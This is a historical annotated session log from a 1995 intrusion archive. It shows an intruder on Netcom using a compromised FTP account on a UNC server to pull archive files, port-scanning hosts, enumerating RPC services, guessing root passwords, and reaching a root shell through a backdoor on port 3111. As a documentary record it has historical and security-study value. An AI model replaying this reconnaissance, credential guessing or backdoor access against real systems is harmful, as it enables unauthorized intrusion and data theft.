Kevin On Demand
- Spooked - kevin-on-demand.takedown.com 4024
- Start: 1995 Feb 14 11:23:54
- Total Run Time: 7:15
- From NETCOM-rtp1.netcom.net to netcom15.netcom.com.
- Frustrated that his back door on one of Netcom's machines has been closed, tries password ".fukhood" for the benefit of Robert Hood, should he be watching. Spooked, and moving lots of things around.
ftp
ftp> open president.oit.unc.edu
Connected to president.oit.unc.edu.
220 president FTP server (SunOS 4.1) ready.
Name (president.oit.unc.edu:gkremen): ingres
331 Password required for ingres.
Password: ali**
230 User ingres logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> mget c6*
mget c682x.tar.gz? y
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes
^Z
Stopped
gkremen:UNKNOWN:netcom15:/u1/gkremen:2> bg &
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes).
No job control in subshells.
[2] 4037
[2] Exit 1 bg
gkremen:UNKNOWN:netcom15:/u1/gkremen:3> bg
[1] sh &
gkremen:UNKNOWN:netcom15:/u1/gkremen:4> ps
PID TT STAT TIME COMMAND
3933 p8 S 0:00 -csh (csh)
3974 p8 S 0:00 sh
3990 p8 S 0:00 ftp
4044 p8 R 0:00 ps
gkremen:UNKNOWN:netcom15:/u1/gkremen:5> sh
$ cd /usr/spool/uucppublic
$ cd gkremen
$ ls -tla c*
-rw------- 1 gkremen 932940 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw------- 1 gkremen 989880 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw------- 1 gkremen 1119820 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ which ftp
/usr/ucb/ftp
$ cd /log
/log: Permission denied
$ cd /
$ ls -ld log
drwxr-x--- 11 root 4096 Jan 12 00:01 log
$ ls -ldg log
drwxr-x--- 11 root daemon 4096 Jan 12 00:01 log
$ cd
$ ./scan mail 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
23:telnet:
37:time:
111:sunrpc:
113:auth:
$ scan nntp 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ scan netcomsv 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
21:ftp:
23:telnet:
25:smtp:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ /usr/etc/showmount -e netcomsv
netcomsv: RPC: Program not registered
$ telnet
telnet> open netcomsv
Connected to netcomsv.
Escape character is '^]'.
SunOS UNIX (netcomsv)
login: root
Password: .fukhood
Login incorrect
login: root
Password: .neill.
Login incorrect
login: root
Password: .neill.
Login incorrect
login: ingres
Password: ali**
Login incorrect
^D
login: Connection closed by foreign host.
$ finger @netcomsv
[netcomsv] connect: Connection refused
$ pwd
/u1/gkremen
$ id
uid=17988(gkremen) gid=50(users0) groups=50(users0)
$ rpc
rpc: execute permission denied
$ rpcinfo
rpcinfo: not found
$ /usr/etc/rpcinfo -p netcomsv
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100029 1 udp 662 keyserv
100024 1 udp 733 status
100024 1 tcp 735 status
100003 2 udp 2049 nfs
100021 1 tcp 739 nlockmgr
100021 1 udp 1028 nlockmgr
100021 3 tcp 743 nlockmgr
100021 3 udp 1030 nlockmgr
100020 2 udp 1031 llockmgr
100020 2 tcp 748 llockmgr
100021 2 tcp 751 nlockmgr
100021 2 udp 1032 nlockmgr
100001 2 udp 4609 rstatd
100001 3 udp 4609 rstatd
100001 4 udp 4609 rstatd
100012 1 udp 4610 sprayd
226 Binary Transfer complete.
local: c682x.tar.gz remote: c682x.tar.gz
5887242 bytes received in 2.4e+02 seconds (24 Kbytes/s)
ftp>
$ grep -v suid /etc/fstab
/dev/sd0a / 4.2 rw 1 1
/dev/sd0g /usr 4.2 ro 1 2
[1] + Stopped (tty input) sh
gkremen:UNKNOWN:netcom15:/u1/gkremen:6> fg
ftp> type
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
$ pwd
/usr/spool/uucppublic/gkremen
$ ls -tla c6*
-rw------- 1 gkremen 5887242 Feb 14 11:28 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
$ file c6*
c682f.tar.Z: compressed data block compressed 16 bits
c682us.tar.Z: compressed data block compressed 16 bits
c682x.tar.Z: compressed data block compressed 16 bits
c682x.tar.gz: data
c68hv.tar.Z: compressed data block compressed 16 bits
$ chmod 644 *
$ touch *
$ cd
$ test1
test> open president.oit.unc.edu 3111
Trying 152.2.22.97 ...
Connected to president.oit.unc.edu.
Escape character is '^]'.
nm
SunOS UNIX (president)
president#